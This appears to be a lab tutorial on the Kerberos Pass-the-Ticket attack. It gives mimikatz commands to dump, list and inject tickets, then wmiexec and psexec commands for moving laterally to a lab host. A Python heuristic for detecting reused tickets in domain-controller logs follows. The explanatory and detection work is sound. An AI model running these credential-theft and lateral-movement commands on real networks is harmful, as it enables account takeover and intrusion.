Pass-the-Ticket (PtT) is a Kerberos-based attack in which an attacker steals a valid Kerberos ticket, either a TGT (Ticket Granting Ticket) or a service ticket (TGS), and reuses it to access network resources without knowing the user’s password or NTLM hash.
✅ Key Benefit: Because the stolen ticket is already valid, presenting it satisfies Kerberos authentication and no further credential check takes place.
Tickets are stored in memory and can be extracted using:
mimikatz.exe
sekurlsa::tickets /export
This dumps TGTs and TGSs from the compromised machine.
List all the Kerberos tickets currently available in memory.
kerberos::list
Once you have the ticket, you can load it into memory on another machine:
mimikatz.exe
kerberos::ptt <ticket.kirbi>
kerberos::ptt [0;3e7][email protected]
Now, you can use the ticket as if you were the legitimate user.
After injecting the ticket, you can access resources without re-authenticating:
dir \\THEPUNISHER\C$
wmiexec.py -k -no-pass MARVEL.local/Administrator@THEPUNISHER
psexec.exe \\THEPUNISHER cmd.exe
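On the detection side, a ticket loaded "on another machine" leaves a gap in the domain controller's logs: service ticket requests (event 4769) arrive from a host that was never issued a TGT (event 4768) for that account. The following is an added example, not code from the original page; the event dictionary layout, the sample accounts and IP addresses, and the 10-hour ticket lifetime are assumptions.

```python
from datetime import datetime, timedelta

# Assumption: default domain policy (10-hour maximum TGT lifetime).
TGT_LIFETIME = timedelta(hours=10)

def _key(ev):
    # 4768 logs "Administrator"; 4769 logs "Administrator@MARVEL.LOCAL".
    user = ev["user"].split("@")[0].lower()
    # Domain controllers log IPv4 clients as "::ffff:a.b.c.d".
    ip = ev["ip"][7:] if ev["ip"].startswith("::ffff:") else ev["ip"]
    return user, ip

def find_reused_tgts(events):
    """Flag 4769 requests from a (user, IP) pair that was never issued a TGT (4768)."""
    issued, alerts = {}, []   # issued: (user, ip) -> time of latest 4768
    for ev in sorted(events, key=lambda e: e["time"]):
        user, ip = _key(ev)
        if ev["id"] == 4768:
            issued[(user, ip)] = ev["time"]
        elif ev["id"] == 4769 and not user.endswith("$"):   # skip machine accounts
            last = issued.get((user, ip))
            if last is None or ev["time"] - last > TGT_LIFETIME:
                # Hosts that do hold a live TGT for this user: likely theft origin.
                origin = sorted(i for (u, i), t in issued.items()
                                if u == user and ev["time"] - t <= TGT_LIFETIME)
                alerts.append({"user": user, "ip": ip, "service": ev["service"],
                               "tgt_issued_to": origin})
    return alerts

def _ev(eid, hhmm, user, ip, service="krbtgt"):
    t = datetime.fromisoformat("2024-01-15T" + hhmm + ":00")
    return {"id": eid, "time": t, "user": user, "ip": ip, "service": service}

# Constructed sample events (not real logs); host and realm names reuse the page's lab.
SAMPLE_EVENTS = [
    _ev(4768, "09:00", "Administrator", "::ffff:10.0.0.20"),
    _ev(4769, "09:05", "Administrator@MARVEL.LOCAL", "::ffff:10.0.0.20", "THEPUNISHER$"),
    _ev(4768, "09:10", "pparker", "::ffff:10.0.0.31"),
    _ev(4769, "09:12", "pparker@MARVEL.LOCAL", "::ffff:10.0.0.31", "THEPUNISHER$"),
    # Same account, service ticket requested from a host that never obtained a TGT.
    _ev(4769, "09:30", "Administrator@MARVEL.LOCAL", "::ffff:10.0.0.66", "THEPUNISHER$"),
]

if __name__ == "__main__":
    for alert in find_reused_tgts(SAMPLE_EVENTS):
        print(alert)
```

This is a heuristic: clients behind NAT, or hosts whose DHCP lease changed after the TGT was issued, will also trigger it, so treat a hit as a lead to correlate with host telemetry.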